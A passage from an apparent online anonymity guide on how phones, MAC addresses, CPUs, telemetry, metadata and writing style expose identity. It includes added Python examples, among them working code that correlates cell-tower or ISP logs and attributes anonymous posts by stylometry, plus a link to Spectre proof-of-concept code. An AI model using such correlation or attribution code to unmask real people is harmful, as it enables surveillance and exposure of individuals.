The mobile operator's subscriber logs will usually store the IMEI along with the IMSI in their subscriber information database. If you use a prepaid anonymous SIM (anonymous IMSI but a known IMEI), they can see that this phone belongs to you if you previously used that phone with a different SIM card (different anonymous IMSI but the same known IMEI).
The mobile operator's antenna (cell tower) logs record which IMEI/IMSI combination connected to which antennas, along with connection data such as how strong the signal to each antenna was, which allows easy triangulation/geolocation of the phone. They also record which other phones (your real one, for instance) were connected at the same time to the same antennas with similar signal strength. This makes it possible to establish that this "burner phone" was always at the same place and time as another "known phone" that shows up every time the burner is used. This information can be and is used by various third parties to geolocate/track you quite precisely92'93.
The manufacturer of the phone can trace back the sale of the phone using the IMEI if it was bought in a non-anonymous way. Indeed, they keep logs of each phone sale (including serial number and IMEI) and of the shop/person it was sold to. If you use a phone that you bought online (or from someone who knows you), it can be traced to you using that information. Even if they do not find you on CCTV94 and you paid cash, they can still find out what other phone (your real one, in your pocket) was in that shop at that time/date using the antenna logs.
The IMSI alone can be used to find you as well because most countries now require customers to provide an ID when buying a SIM card (subscription or pre-paid). The IMSI is then tied to the identity of the buyer of the card. In the countries where the SIM can still be bought with cash (like the UK), they still know where (which shop) it was bought and when. This information can then be used to retrieve information from the shop itself (such as CCTV footage as for the IMEI case). Or again the antenna logs can also be used to figure out which other phone was there at the moment of the sale.
The smartphone OS makers (Google/Apple for Android/iOS) also keep logs of IMEI/IMSI identifiers tied to Google/Apple accounts and of which user has been using them. They too can trace back the history of the phone and the accounts it was tied to in the past95.
Government agencies around the world interested in your phone number can and do use96 special devices called "IMSI catchers"97, like the Stingray98 or, more recently, the Nyxcell99. These devices impersonate (spoof) a cell phone antenna and force a specific IMSI (your phone) to connect to them to access the cell network. Once it does, they can mount various MITM100 (man-in-the-middle) attacks that allow them to:
Tap your phone (voice calls and SMS).
Sniff and examine your data traffic.
Impersonate your phone number without controlling your phone.
…
Here is also a good YouTube video on this topic: DEFCON Safe Mode - Cooper Quintin - Detecting Fake 4G Base Stations in Real-Time https://www.youtube.com/watch?v=siCk4pGGcqA [Invidious]
For these reasons, it is crucial to get a dedicated anonymous phone number and/or an anonymous burner phone with a cash-bought pre-paid sim card that is not tied to you in any way (past or present) for conducting sensitive activities. It is also possible to get an anonymous pre-paid but preferably dedicated number from free and paid online services accepting anonymous cryptocurrencies like Monero. Get more practical guidance here: Getting an anonymous Phone number.
While some smartphone manufacturers like Purism with their Librem series101 claim to have your privacy in mind, they still do not allow IMEI randomization, which we believe is a key anti-tracking feature that such manufacturers should provide. This measure would not prevent IMSI tracking through the SIM card, but it would at least let you keep the same "burner phone" and only switch SIM cards instead of having to switch both for privacy.
See Appendix N: Warning about smartphones and smart devices
The MAC address102 is a unique identifier tied to your physical network interface (wired Ethernet or Wi-Fi) and can of course be used to track you if it is not randomized. As with the IMEI, manufacturers of computers and network cards usually keep logs of their sales (usually including things like serial numbers, IMEIs for devices with cellular modems, MAC addresses, …), so it is again possible for them to find where and when the computer with a given MAC address was sold and to whom. Even if you paid cash in a supermarket, the supermarket might still have CCTV (or there is a camera just outside the shop), and again the time/date of sale can be used to find out who was there using the mobile provider's antenna logs (IMEI/IMSI).
Operating Systems makers (Google/Microsoft/Apple) will also keep logs of devices and their MAC addresses in their logs for device identification (Find my device type services for example). Apple can tell that the MacBook with this specific MAC address was tied to a specific Apple Account before. Maybe yours before you decided to use the MacBook for sensitive activities. Maybe to a different user who sold it to you but remembers your e-mail/number from when the sale happened.
Your home router/Wi-Fi access point keeps logs of devices registered on the Wi-Fi, and these can be accessed too to find out who has been using your Wi-Fi. Sometimes this can be done remotely (and silently) by the ISP, depending on whether that router/access point is "managed" remotely by the ISP (which is often the case when they provide the router to their customers).
Some commercial devices will keep a record of MAC addresses roaming around for various purposes such as road congestion103.
So, it is again important not to bring your phone along when/where you conduct sensitive activities. If you use your own laptop, it is crucial to hide that MAC address (and Bluetooth address) anywhere you use it, and to be extra careful not to leak it. Thankfully, many recent OSes now randomize MAC addresses or let you enable it (Android, iOS, Linux, and Windows 10/11), with the notable exception of macOS, which at the time of writing does not offer this feature. Note that a randomized address only helps if it changes per network (or per connection): a "stable" per-network random MAC still lets the same network recognize you when you return.
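As a quick check that randomization is actually in effect on a Linux laptop, here is an added example (not from the guide) that inspects the interfaces listed by `ip link`: a randomized address has the locally administered (U/L) bit set in the first octet, while a burned-in vendor address has it clear. The `ip link` text below is a constructed sample, not output from a real machine; the interface names and addresses are made up.

```python
import re
import secrets
import sys

# Constructed sample of `ip link` output (not captured from a real machine).
# wlan0 carries a burned-in style address (U/L bit clear), wlan1 a randomized,
# locally administered address (U/L bit set); lo has no Ethernet address.
SAMPLE_IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
    link/ether 00:11:22:33:44:55 brd ff:ff:ff:ff:ff:ff
3: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
    link/ether da:7f:31:9c:02:e4 brd ff:ff:ff:ff:ff:ff
"""


def first_octet(mac: str) -> int:
    return int(mac.split(":")[0], 16)


def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet is the U/L bit: 1 = locally administered.
    Randomized MACs (Android, iOS, NetworkManager, Windows) set this bit;
    a factory address from a vendor OUI has it clear."""
    return bool(first_octet(mac) & 0x02)


def is_multicast(mac: str) -> bool:
    """Bit 0 of the first octet is the I/G bit; a station address must have it clear."""
    return bool(first_octet(mac) & 0x01)


def random_laa_mac() -> str:
    """Generate a unicast, locally administered MAC from the OS CSPRNG."""
    octets = bytearray(secrets.token_bytes(6))
    octets[0] = (octets[0] | 0x02) & 0xFE  # set U/L, clear I/G
    return ":".join(f"{b:02x}" for b in octets)


IFACE_RE = re.compile(r"^\d+:\s+([^:@\s]+)")
ETHER_RE = re.compile(r"^\s+link/ether\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b")


def audit_interfaces(ip_link_output: str) -> dict:
    """Map each interface with a link/ether line to (mac, randomized?).
    Interfaces without one (loopback, tunnels) are skipped."""
    result, current = {}, None
    for line in ip_link_output.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = ETHER_RE.match(line)
        if m and current:
            mac = m.group(1)
            result[current] = (mac, is_locally_administered(mac))
    return result


def not_randomized(ip_link_output: str) -> list:
    """Names of interfaces still exposing a factory (universally administered) address."""
    return sorted(name for name, (_, rnd) in audit_interfaces(ip_link_output).items() if not rnd)


if __name__ == "__main__":
    # Pipe real output in (`ip link | python3 mac_audit.py`), otherwise use the sample.
    text = SAMPLE_IP_LINK if sys.stdin.isatty() else sys.stdin.read()
    for name, (mac, rnd) in audit_interfaces(text).items():
        print(f"{name}: {mac} {'randomized' if rnd else 'FACTORY ADDRESS, not randomized'}")
    print("fresh address to apply with `ip link set dev <iface> address ...`:", random_laa_mac())
```

To switch a NetworkManager Wi-Fi profile to a new random address on every connection, use `nmcli connection modify "<profile>" wifi.cloned-mac-address random`; to set one by hand, bring the interface down and run `ip link set dev wlan0 address <mac>`. The U/L bit only tells you the address is not the factory one; it cannot tell you whether the OS hands the same random address to the same network every time.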
See Appendix N: Warning about smartphones and smart devices
Your Bluetooth MAC is like the earlier MAC address except it is for Bluetooth. Again, it can be used to track you as manufacturers and operating system makers keep logs of such information. It could be tied to a sale place/time/date or accounts and then could be used to track you with such information, the shop billing information, the CCTV, or the mobile antenna logs in correlation.
Operating systems have protections in place to randomize those addresses but are still subject to vulnerabilities104.
For this reason, and unless you really need those, you should just disable Bluetooth completely in the BIOS/UEFI settings if possible or in the Operating System otherwise.
On Windows 10, you will need to disable and enable the Bluetooth device in the device manager itself to force randomization of the address for next use and prevent tracking.
In general, this should not be too much of a concern compared to MAC Addresses. BT Addresses are randomized quite often.
See Appendix N: Warning about smartphones and smart devices
All modern CPUs105 are now integrating hidden management platforms such as the now infamous Intel Management Engine106 and the AMD Platform Security Processor107.
Those management platforms are small operating systems running on a dedicated processor inside your CPU/chipset for as long as the system has (standby) power. They have their own access to your computer's network interface and could be used by an adversary to de-anonymize you in various ways (using direct access or malware, for instance), as shown in this enlightening video: BlackHat, How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine https://www.youtube.com/watch?v=9fhNokIgBMU [Invidious].
These have already been affected by several security vulnerabilities in the past108 that allowed malware to gain control of target systems. These are also accused by many privacy actors including the EFF and Libreboot of being a backdoor into any system109.
There are some not-so-straightforward ways110 to disable the Intel ME on some CPUs, and you should do so if you can. On some AMD laptops, you can disable the PSP in the BIOS/UEFI settings.
Note that, to AMD's defense, far fewer security issues have been publicly documented for the PSP (now called the AMD Secure Processor, ASP) and no backdoor has been found. See https://www.youtube.com/watch?v=bKH5nGLgi08&t=2834s [Invidious]. In addition, the AMD PSP does not provide remote management capabilities, contrary to Intel ME with its AMT component.
If you are feeling a bit more adventurous, you could install your own BIOS using Coreboot111 or Libreboot (a distribution of Coreboot) if your laptop supports it. Coreboot allows users to add their own microcode or other firmware blobs in order for the machine to function, but this is based upon user choice, and as of Dec 2022, Libreboot has adopted a similar pragmatic approach in order to support newer devices in the Coreboot tree. (Thanks, kind Anon who corrected previous information in this paragraph.)
Check yourself:
If you are using Linux you can check the vulnerability status of your CPU to Spectre/Meltdown attacks by using https://github.com/speed47/spectre-meltdown-checker [Archive.org] which is available as a package for most Linux distros including Whonix. Spectre is a transient execution attack. There is also PoC code for Spectre v1 and v2 on iPhone devices here: https://github.com/cispa/BranchDifferent [Archive.org] and here https://misc0110.net/files/applespectre_dimva22.pdf [Archive.org]
If you are using Windows, you can check the vulnerability status of your CPU using inSpectre https://www.grc.com/inspectre.htm [Archive.org]
Some CPUs have unfixable flaws (especially Intel CPUs) that could be exploited by various malware. Here is a good current list of such vulnerabilities affecting recent widespread CPUs: https://en.wikipedia.org/wiki/Transient_execution_CPU_vulnerability [Wikiless] [Archive.org]
Some of these can be avoided using Virtualization Software settings that can mitigate such exploits. See this guide for more information https://www.whonix.org/wiki/Spectre_Meltdown [Archive.org] (warning: these can severely impact the performance of your VMs).
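On Linux the kernel exposes the same status the checker script reads under `/sys/devices/system/cpu/vulnerabilities/`, one file per issue, with lines starting with "Not affected", "Mitigation: …" or "Vulnerable…". The added example below (not part of the guide or of spectre-meltdown-checker) reads that directory when present, classifies each entry, flags mitigations that still report SMT as exposed, and applies a simple pass/fail policy of our own choosing. The dictionary of sample values is constructed to show the different states and does not describe any particular CPU.

```python
import os

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# Constructed sample of file contents for a hypothetical laptop. Real values
# differ per CPU model, microcode version and kernel.
SAMPLE_SYSFS = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: usercopy/swapgs barriers and __user pointer sanitization",
    "spectre_v2": "Mitigation: Retpolines, IBPB: conditional, IBRS_FW, STIBP: conditional, RSB filling",
    "mds": "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable",
    "l1tf": "Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable",
    "tsx_async_abort": "Not affected",
    "retbleed": "Vulnerable",
    "srbds": "Mitigation: Microcode",
}


def classify(status_line: str) -> str:
    """Collapse one sysfs status line into not_affected / mitigated / vulnerable / unknown."""
    s = status_line.strip()
    if s.startswith("Not affected"):
        return "not_affected"
    if s.startswith("Mitigation"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def read_sysfs(path: str = SYSFS_DIR) -> dict:
    """Read every file in the kernel's vulnerabilities directory (Linux only);
    returns an empty dict elsewhere."""
    out = {}
    if not os.path.isdir(path):
        return out
    for name in sorted(os.listdir(path)):
        try:
            with open(os.path.join(path, name)) as f:
                out[name] = f.read()
        except OSError:
            continue
    return out


def assess(statuses: dict) -> dict:
    """Group issue names by classification and list those whose status line still
    reports SMT (hyperthreading) as exposed."""
    report = {"not_affected": [], "mitigated": [], "vulnerable": [], "unknown": [], "smt_exposed": []}
    for name, line in sorted(statuses.items()):
        report[classify(line)].append(name)
        if "SMT vulnerable" in line:
            report["smt_exposed"].append(name)
    return report


def acceptable(statuses: dict) -> bool:
    """Policy used here (our assumption, not the guide's): nothing may be Vulnerable
    or Unknown, and no mitigation may leave SMT exposed."""
    r = assess(statuses)
    return not r["vulnerable"] and not r["unknown"] and not r["smt_exposed"]


if __name__ == "__main__":
    live = read_sysfs()
    data = live or SAMPLE_SYSFS
    print("source:", "sysfs" if live else "constructed sample")
    for category, names in assess(data).items():
        print(f"{category:>13}: {', '.join(names) or '-'}")
    print("acceptable for sensitive use:", acceptable(data))
```

If the live report shows "SMT vulnerable" on a laptop you intend to use for sensitive work, disabling SMT (`nosmt` on the kernel command line, or in firmware) is the usual trade of performance for isolation, which is the same trade the Whonix page above describes for VMs.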
This guide won’t go too deep into side-channel and microarchitecture attacks but we will highlight some issues with both Intel and AMD CPU architectures that will be mitigated throughout. It’s important to recognize hardware is just as susceptible to bugs, and therefore exploitation, regardless of manufacturer.
We will mitigate some of these issues in this guide by recommending the use of virtual machines on a dedicated anonymous laptop for your sensitive activities that will only be used from an anonymous public network.
In addition, we recommend the use of AMD CPUs instead of Intel CPUs.
Whether it is Android, iOS, Windows, macOS, or even Ubuntu, most popular operating systems now collect telemetry by default, even if you never opted in or opted out112 from the start. Some, like Windows, do not even allow disabling telemetry completely without technical tweaks. This collection can be extensive and include a staggering number of details (metadata and data) about your devices and their usage.
Here are good overviews of what is being collected by those five popular OSes in their last versions:
Android/Google:
Have a read of their privacy policy https://policies.google.com/privacy [Archive.org]
School of Computer Science & Statistics, Trinity College Dublin, Ireland Mobile Handset Privacy: Measuring The Data iOS and Android Send to Apple And Google https://www.scss.tcd.ie/doug.leith/apple_google.pdf [Archive.org]
iOS/Apple:
More information at https://www.apple.com/legal/privacy/en-ww/ [Archive.org] and https://support.apple.com/en-us/HT202100 [Archive.org]
School of Computer Science & Statistics, Trinity College Dublin, Ireland Mobile Handset Privacy: Measuring The Data iOS and Android Send to Apple And Google https://www.scss.tcd.ie/doug.leith/apple_google.pdf [Archive.org]
Apple does claim113 that they anonymize this data using differential privacy114 but you will have to trust them on that.
Windows/Microsoft:
Full list of required diagnostic data: https://docs.microsoft.com/en-us/windows/privacy/required-windows-diagnostic-data-events-and-fields-2004 [Archive.org]
Full list of optional diagnostic data: https://docs.microsoft.com/en-us/windows/privacy/windows-diagnostic-data [Archive.org]
macOS:
Ubuntu:
Not only are operating systems gathering telemetry, but so are the apps themselves, like browsers, mail clients, and social networking apps installed on your system.
It is important to understand that this telemetry data can be tied to your device, can help de-anonymize you, and can later be used against you by an adversary who gets access to it.
This does not mean, for example, that Apple devices are terrible choices for good privacy (though this might be changing115), but they are certainly not the best choices for (relative) anonymity. They might protect you from third parties knowing what you are doing, but not from Apple itself. In all likelihood, they know who you are.
Later in this guide, we will use all the means at our disposal to disable and block as much telemetry as possible to mitigate this attack vector in the Operating Systems supported in this guide. These will include Windows, macOS, and even Linux in some regard.
See Appendix N: Warning about smartphones and smart devices
You got it; your smartphone is an advanced spying/tracking device that:
Records everything you say at any time (“Hey Siri”, “Hey Google”).
Records your location everywhere you go.
Always records other devices around you (Bluetooth devices, Wi-Fi Access points).
Records your habits and health data (steps, screen time, exposure to diseases, connected devices data)
Records all your network locations.
Records all your pictures and videos (and most likely where they were taken).
Has most likely access to most of your known accounts including social media, messaging, and financial accounts.
Data is being transmitted even if you opt-out116, processed, and stored indefinitely (most likely unencrypted117) by various third parties118.
But that is not all, this section is not called “Smartphones” but “Smart devices” because it is not only your smartphone spying on you. It is also every other smart device you could have:
Your Smart Watch? (Apple Watch, Android Smartwatch …)
Your Fitness Devices and Apps119‘120? (Strava121’122, Fitbit123, Garmin, Polar124, …)
Your Smart Speaker? (Amazon Echo/Alexa125, Google Home/Nest, Apple HomePod …)
Your Smart Transportation? (Car? Scooter?)
Your Smart Tags? (Apple AirTag, Galaxy SmartTag, Tile…)
Your Car? (Yes, most modern cars have advanced logging/tracking features these days126)
Any other Smart device? There are even convenient search engines dedicated to finding them online:
See Appendix N: Warning about smartphones and smart devices
Conclusion: Do not bring your smart devices with you when conducting sensitive activities.
Your metadata is all the information about your activities without the actual content of those activities. For instance, it is like knowing you had a call from an oncologist before then calling your family and friends successively. You do not know what was said during the conversation, but you can guess what it was just from the metadata127.
This metadata will also often include your location that is being harvested by Smartphones, Operating Systems (Android128/IOS), Browsers, Apps, Websites. Odds are several companies are knowing exactly where you are at any time129 because of your smartphone130.
This location data has been used in many judicial cases131 already as part of “geofencing warrants” 132 that allow law enforcement to ask companies (such as Google/Apple) a list of all devices present at a certain location at a certain time. In addition, this location data is even sold by private companies to the military who can then use it conveniently133. These warrants are becoming widely used by law enforcement134‘135’136.
If you want to experience yourself what a “geofencing warrant” would look like, here is an example: https://wigle.net/.
Now let us say you are using a VPN to hide your IP. The social media platform knows you were active on that account on November 4th from 8 am to 1 pm with that VPN IP. The VPN allegedly keeps no logs and cannot trace back that VPN IP to your IP. Your ISP however knows (or at least can know) you were connected to that same VPN provider on November 4th from 7:30 am to 2 pm but does not know what you were doing with it.
The question is: Is there someone somewhere that would have both pieces of information available137 for correlation in a convenient database?
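The two situations above, a burner phone that keeps showing up on the same cell towers as a known phone (from the IMEI/IMSI section) and an ISP seeing a VPN session that overlaps an account's activity on a platform, are the same computation: find which identity in one log co-occurs with the target in the other log, on the same location key and in overlapping time windows, and rank candidates by how many of the target's sessions they explain. The Python below is an added illustration, not the guide's own material or any operator's real tooling. The sessions, identifiers, cell IDs and the 203.0.113.0/24 addresses are constructed, and the VPN case assumes the ISP's destination IP and the platform's source IP can be mapped to the same VPN server.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Session:
    entity: str      # what this log identifies: an IMEI, a subscriber line, an account
    key: str         # what both logs share: a cell ID, or the VPN server's IP
    start: datetime
    end: datetime


def overlaps(a: Session, b: Session, slack: timedelta) -> bool:
    """True if the two intervals intersect, allowing `slack` for clock skew and log granularity."""
    return a.start <= b.end + slack and b.start <= a.end + slack


def correlate(targets, candidates, slack=timedelta(0)) -> Counter:
    """Count, per candidate entity, how many of the target's sessions it shared
    (same key, overlapping time). At most one hit per target session per entity."""
    hits = Counter()
    for t in targets:
        present = {c.entity for c in candidates if c.key == t.key and overlaps(t, c, slack)}
        hits.update(present)
    return hits


def rank(targets, candidates, slack=timedelta(0)) -> list:
    """Candidates ordered by co-occurrence count, with the fraction of target sessions explained."""
    n = len(targets)
    return [(e, k, k / n) for e, k in correlate(targets, candidates, slack).most_common()]


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def cell_example() -> list:
    """Antenna logs (constructed): a burner IMEI vs. every other IMEI seen on the same cells."""
    burner = [
        Session("IMEI-BURNER", "cell-101", ts("2023-03-01T09:00"), ts("2023-03-01T09:10")),
        Session("IMEI-BURNER", "cell-205", ts("2023-03-03T18:30"), ts("2023-03-03T18:45")),
        Session("IMEI-BURNER", "cell-101", ts("2023-03-07T12:00"), ts("2023-03-07T12:05")),
    ]
    others = [
        Session("IMEI-REAL", "cell-101", ts("2023-03-01T08:50"), ts("2023-03-01T09:30")),
        Session("IMEI-REAL", "cell-205", ts("2023-03-03T18:00"), ts("2023-03-03T19:00")),
        Session("IMEI-REAL", "cell-101", ts("2023-03-07T11:55"), ts("2023-03-07T12:20")),
        Session("IMEI-OTHER", "cell-101", ts("2023-03-01T09:05"), ts("2023-03-01T09:07")),
        Session("IMEI-OTHER", "cell-333", ts("2023-03-03T18:30"), ts("2023-03-03T18:45")),
        Session("IMEI-NOISE", "cell-101", ts("2023-03-01T14:00"), ts("2023-03-01T15:00")),  # same cell, wrong time
    ]
    return rank(burner, others)


def vpn_example() -> list:
    """Platform log (account seen from a VPN IP) vs. ISP logs (which lines talked to that VPN server).
    Constructed data; assumes both IPs refer to the same VPN server."""
    platform = [Session("account-X", "203.0.113.7", ts("2023-11-04T08:00"), ts("2023-11-04T13:00"))]
    isp = [
        Session("line-001", "203.0.113.7", ts("2023-11-04T07:30"), ts("2023-11-04T14:00")),
        Session("line-002", "203.0.113.7", ts("2023-11-04T15:00"), ts("2023-11-04T16:00")),  # same VPN, later
        Session("line-003", "203.0.113.9", ts("2023-11-04T07:00"), ts("2023-11-04T14:00")),  # other server
    ]
    return rank(platform, isp, slack=timedelta(minutes=5))


if __name__ == "__main__":
    for label, result in (("cell", cell_example()), ("vpn", vpn_example())):
        for entity, count, frac in result:
            print(f"{label}: {entity} matched {count} session(s) ({frac:.0%})")
```

The adversary needs no content, only timestamps and a shared key. With real logs the slack parameter absorbs clock skew and log granularity, and the ranking sharpens with every additional session: one overlap is a coincidence, three at different towers on different days is a person.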
Have you heard of Edward Snowden138? Now is the time to google him and read his book139. Also read about XKEYSCORE140’141, MUSCULAR142, SORM143, Tempora144 , and PRISM145.
See “We kill people based on Metadata”146 or this famous tweet from the IDF https://twitter.com/idf/status/1125066395010699264 [Archive.org] [Nitter].
See Appendix N: Warning about smartphones and smart devices
This is the part where you should watch the documentary “The Social Dilemma”147 on Netflix as they cover this topic much better than anyone else.
This includes the way you write (stylometry)148'149, the way you behave150'151, the way you click, the way you browse, and the fonts you use in your browser152. Fingerprinting is used to guess who someone is by the way they behave. You might use specific pedantic words or make specific spelling mistakes that could give you away with a simple Google search for similar features, because you typed comparably in some Reddit post five years ago using a not-so-anonymous Reddit account153. The words you type into a search engine alone can be used against you, as authorities now obtain warrants to find users who searched for specific keywords154.
Social Media platforms such as Facebook/Google can go a step further and can register your behavior in the browser itself. For instance, they can register everything you type even if you do not send it / save it. Think of when you draft an e-mail in Gmail. It is saved automatically as you type. They can register your clicks and cursor movements as well.
All they need to achieve this in most cases is JavaScript enabled in your browser (which is the case in most browsers, including Tor Browser at its default Standard security level). Even with JavaScript disabled, there are still ways to fingerprint you155.
While these methods are usually used for marketing purposes and advertising, they can also be a useful tool for fingerprinting users. This is because your behavior is unique or unique enough that over time, you could be de-anonymized.
Here are some examples:
Specialized companies are selling to, for example, law enforcement agencies products for analyzing social network activities such as https://mediasonar.com/ [Archive.org]
For example, as a basis of authentication, a user’s typing speed, keystroke depressions, patterns of error (say accidentally hitting an “l” instead of a “k” on three out of every seven transactions) and mouse movements establish that person’s unique pattern of behavior156. Some commercial services such as TypingDNA (https://www.typingdna.com/ [Archive.org]) even offer such analysis as a replacement for two-factor authentications.
This technology is also widely used by CAPTCHA157 services to verify that you are "human" and can be used to fingerprint a user.
Analysis algorithms could then be used to match these patterns with other users and match you to a different known user. It is unclear whether such data is already used or not by Governments and Law Enforcement agencies, but it might be in the future. And while this is mostly used for advertising/marketing/captchas purposes now. It could and probably will be used for investigations in the short or mid-term future to deanonymize users.
Here is a fun example you can try yourself to see some of these things in action: https://clickclickclick.click (no archive links for this one, sorry). You will see it becoming interesting over time (this requires JavaScript enabled).
Here is also a recent example just showing what Google Chrome collects on you: https://web.archive.org/web/https://pbs.twimg.com/media/EwiUNH0UYAgLY7V?format=jpg&name=4096x4096
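To make the stylometry point concrete, here is an added example (not from the guide, and not how any real attribution service works) that extracts a handful of writing-habit features from short posts and attributes an anonymous post to whichever known account writes most similarly. The posts are constructed for this illustration and belong to no real account. Real systems use hundreds of features (function-word frequencies, character n-grams, punctuation and error patterns) rather than the four toy markers here, but the mechanism is the same.

```python
import math
import re

ABBREVIATIONS = {"btw", "tbh", "imo", "imho", "afaik", "lol"}
BRITISH = {"colour", "favourite", "behaviour", "realise", "organise", "centre", "defence"}

# Constructed posts (no real accounts). author_A writes a lowercase "i", uses chat
# abbreviations, British spelling and ellipses; author_B does none of that.
KNOWN_POST_A = ("btw i think the new router is great, the colour is a bit weird tho... "
                "anyway i set it up in like 5 minutes. tbh the old one was rubbish.")
KNOWN_POST_B = ("I tested this VPN on my laptop yesterday. The app works well and the color "
                "scheme is fine. Does anyone know whether it leaks DNS queries?")
ANON_POST = ("i tried the vpn on my phone... works fine tbh, but the app colour scheme is "
             "awful. btw does anyone know if it leaks dns?")
# The same message with the writing habits deliberately dropped.
ANON_POST_DISCIPLINED = ("I tried the VPN on my phone. It works fine, but the app color scheme "
                         "is awful. Does anyone know if it leaks DNS?")
KNOWN = {"author_A": KNOWN_POST_A, "author_B": KNOWN_POST_B}


def features(text: str) -> list:
    """Toy stylometric profile: per-word rates of (lowercase 'i' as pronoun,
    chat abbreviations, British spellings, ellipses)."""
    words = re.findall(r"[A-Za-z']+", text)
    n = max(len(words), 1)
    lower = [w.lower() for w in words]
    return [
        len(re.findall(r"\bi\b", text)) / n,   # case-sensitive: only a lowercase i
        sum(w in ABBREVIATIONS for w in lower) / n,
        sum(w in BRITISH for w in lower) / n,
        text.count("...") / n,
    ]


def distance(a: list, b: list) -> float:
    """Euclidean distance between two feature vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def nearest_author(unknown: str, known: dict) -> tuple:
    """(author, distance) of the known sample whose profile is closest to the unknown text."""
    fu = features(unknown)
    d, author = min((distance(fu, features(t)), a) for a, t in known.items())
    return author, d


def demo() -> dict:
    """Attribute both anonymous posts against the known accounts."""
    return {label: nearest_author(post, KNOWN)[0]
            for label, post in (("anon", ANON_POST), ("anon_disciplined", ANON_POST_DISCIPLINED))}


if __name__ == "__main__":
    for label, author in demo().items():
        print(f"{label}: closest known profile is {author}")
```

Note the second anonymous post: the same content with the habits dropped (capitalized "I", no abbreviations, no ellipses, American spelling) is attributed elsewhere. That is exactly the discipline the mitigations below ask for, and it has to hold for every post, because a single slip re-links the identity.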
Here are some other resources on the topic if you cannot see this documentary:
2017, Behavior Analysis in Social Networks, https://link.springer.com/10.1007/978-1-4614-7163-9_110198-1 [Archive.org]
2017, Social Networks and Positive and Negative Affect https://www.sciencedirect.com/science/article/pii/S1877042811013747/pdf?md5=253d8f1bb615d5dee195d353dc077d46&pid=1-s2.0-S1877042811013747-main.pdf [Archive.today]
2015, Using Social Networks Data for Behavior and Sentiment Analysis https://www.researchgate.net/publication/300562034_Using_Social_Networks_Data_for_Behavior_and_Sentiment_Analysis [Archive.org]
2016, A Survey on User Behavior Analysis in Social Networks https://www.academia.edu/30936118/A_Survey_on_User_Behaviour_Analysis_in_Social_Networks [Archive.org]
2017, DEF CON 25 presentation: DEF CON 25 - Svea Eckert, Andreas Dewes - Dark Data [Invidious]
2019, Influence and Behavior Analysis in Social Networks and Social Media https://sci-hub.se/10.1007/978-3-030-02592-2 [Archive.org]
So, how can you mitigate these?
This guide will provide some technical mitigations using Fingerprinting resistant tools but those might not be sufficient.
You should apply common sense and try to find your own patterns in your behavior and behave differently when using anonymous identities. This includes:
The way you type (speed, accuracy…).
The words you use (be careful with your usual expressions).
The type of response you use (if you are sarcastic by default, try to have a different approach with your identities).
The way you use your mouse and click (try to solve the Captchas differently than your usual way)
The habits you have when using some Apps or visiting some Websites (do not always use the same menus/buttons/links to reach your content).
…
You need to act and fully adopt a role as an actor would do for a performance. You need to become a different person, think, and act like that person. This is not a technical mitigation but a human one. You can only rely on yourself for that.
Ultimately, it is mostly up to you to fool those algorithms by adopting new habits and not revealing real information when using your anonymous identities. See Appendix A4: Counteracting Forensic Linguistics.
These are clues you might give over time that could point to your real identity. You might be talking to someone or posting on some board/forum/Reddit. In those posts, you might over time leak some information about your real life. These might be memories, experiences, or clues you shared that could then allow a motivated adversary to build a profile to narrow their search.
A real and well-documented case of this was the arrest of the hacker Jeremy Hammond158, who shared several details about his past over time and was later identified.
There are also a few cases involving OSINT at Bellingcat159. Have a look at their very informative (but slightly outdated) toolkit here: https://docs.google.com/spreadsheets/d/18rtqh8EG2q1xBo2cLNyhIDuK9jrPGwYr9DI2UncoqJQ/edit#gid=930747607 [Archive.org]
We have an OSINT discussion room in our Matrix community. Feel free to join at #OSINT:matrix.org.
You can also find convenient lists of available OSINT tools here, for instance if you want to try them on yourself:
As well as this interesting Playlist on YouTube: https://www.youtube.com/playlist?list=PLrFPX1Vfqk3ehZKSFeb9pVIHqxqrNW8Sy [Invidious]
As well as those interesting podcasts:
https://www.inteltechniques.com/podcast.html
You should never share real individual experiences/details using your anonymous identities that could later lead to finding your real identity. You will see more details about this in the Creating new identities section.
“Hell is other people”, even if you evade every method listed above, you are not out of the woods yet thanks to the widespread use of advanced Face recognition by everyone.
Companies like Facebook have used advanced face recognition for years160’161 and have been using other means (Satellite imagery) to create maps of “people” around the world162. This evolution has been going on for years to the point we can now say “we lost control of our faces”163.
If you are walking in a touristy place, you will most likely appear in someone’s selfie within minutes without knowing it. That person could then go ahead and upload that selfie to various platforms (Twitter, Google Photos, Instagram, Facebook, Snapchat …). Those platforms will then apply face recognition algorithms to those pictures under the pretext of allowing better/easier tagging or to better organize your photo library. In addition to this, the same picture will provide a precise timestamp and in most cases geolocation of where it was taken. Even if the person does not provide a timestamp and geolocation, it can still be guessed with other means164’165.
Here are a few resources for even trying this yourself:
Bellingcat, Guide To Using Reverse Image Search For Investigations: https://www.bellingcat.com/resources/how-tos/2019/12/26/guide-to-using-reverse-image-search-for-investigations/ [Archive.org]
Bellingcat, Using the New Russian Facial Recognition Site SearchFace https://www.bellingcat.com/resources/how-tos/2019/02/19/using-the-new-russian-facial-recognition-site-searchface-ru/ [Archive.org]
Bellingcat, Dali, Warhol, Boshirov: Determining the Time of an Alleged Photograph from Skripal Suspect Chepiga https://www.bellingcat.com/resources/how-tos/2018/10/24/dali-warhol-boshirov-determining-time-alleged-photograph-skripal-suspect-chepiga/ [Archive.org]
